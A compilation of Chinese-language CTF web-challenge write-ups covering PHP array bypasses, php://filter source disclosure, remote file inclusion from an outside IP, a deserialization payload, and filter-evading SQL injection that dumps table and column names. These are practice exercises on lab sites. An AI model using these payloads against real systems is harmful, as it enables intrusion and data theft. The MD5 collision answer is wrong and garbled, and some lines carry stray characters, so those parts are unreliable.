㈠ [第四届世安杯](web)writeup
利用ereg和strops处理数组的漏洞,提交?password[]=1
flag{Maybe_using_rexpexp_wasnt_a_clever_move}
观察链接,file后面是一个睁棚base64,解码为key.txt并没有什么用。将index.phpbase64,然后不断修改line读取源码。
view-source:http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=dGhpc2lzX2ZsYWcucGhw
flag{UHGgd3rfH*(3HFhuiEIWF}
最后:
x1=1a&x2={"友早拿x21":"2018a","x22":[[0],0]}&x3=XIPU18570
绕过x3的脚本
CTF{Php_1s_bstl4_1a}
源码提示:``,那就直接进行爆破好了
脚本哪错了?没跑出来,不懂
读取class.php:
http://ctf1.shiyanbar.com/shian-/index.php?user=http://120.27.32.227/3.txt&file=php://filter/convert.base64-encode/resource=class.php&pass=1
读取index.php:
再通过序列化读取flag:
http://ctf1.shiyanbar.com/shian-/index.php?user=http://120.27.32.227/3.txt&file=class.php&pass=O:4 :"Read":1:{s:4:"好搭file";s:57:" php://filter/read=convert.base64-encode/resource=f1a9.php ";}
哦豁。。第一个也可以用 php://input 而不是远程包含绕过
flag_Xd{hSh_ctf:e@syt0g3t}
小记:emm....这种水平的比赛...确实对于某些水平来是浪费时间...感觉自己到了一个瓶颈,难的比赛又不会,一些比较简单的所获甚微。哎....还是要学啊
㈡ bugku_ctf,web第四题_post
这题跟第三题几乎一样,只不过散闷是将get方法换为了并掘老post方法。
使用插件如postman, hackbar, http request maker等等,很多插件。选择post模式,然后在 Body Data (也就是请求主体,请求内容)部分输入 what=flag ,提交即绝升可。
㈢ ctf web 求大神帮帮 payload是什么
这是一段 PHP 代码,看起来是一个 CTF 竞赛中的题目。
这段辩碰代码首先判埋腔断 $_POST['cbc1'] 是否等于 $_POST['cbc2'],并且它们的 MD5 值也相等,如果条件成立,就会继续判断 $_POST['cbc3'] 是否等于 $_POST['cbc4'],并且它们的 MD5 值也相等,如果条件也成立,就会弯灶衫执行 eval($_GET['cmd'])。
因此,我们需要构造一个可以满足上述两个条件的 payload,以便执行 eval($_GET['cmd'])。
一个可能的 payload 如下:
cbc1=a&cbc2=b&cbc3=c&cbc4=dd&cmd=var_mp('Hello, world!')
在这个 payload 中,cbc1 和 cbc2 的值不相等,但是它们的 MD5 值相等,cbc3 和 cbc4 的值也不相等,但是它们的 MD5 值相等,同时执行的命令是 var_mp('Hello, world!')。如果这个 payload 成功执行,就会输出字符串 Hello, world!,证明我们已经成功执行了命令。
㈣ 实验吧web-简单的sql注入之1
题目地址:http://ctf5.shiyanbar.com/423/web/
直接尝试提交'or '1,成功爆出数据,说明单引号和or、空格都没有被吃掉。
接下来再提交'union select 1%23,发现报错
这就说明,我们提交的SQL语句被做了什么处理,看报错的1'来看,应该是union、select和%23(#)
我们再次提交'ununionion selectselect 1--,看到报错
说明--也被吃掉了,而且后台对于union、select进行了处理,应该是将关键词和空格一起吃掉了。
再次提交'union%0aselect%0a1',看到正确结果
初步注入成功,接下来获取数据表名,同样是绕过过滤,这里的关键词过滤是吃掉它们一次,提交'union%0aselect%0agroupgroup_concat_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atabletable_schema_schema=database()%0aand'1
然后是列名,提交'union%0aselect%0agroupgroup_concat_concat(columncolumn_name_name)%0afrom%0ainformationinformation_schema.columns_schema.columns%0awhere%0atabletable_schema_schema=database()%0aand'1
getflag
getflag
the end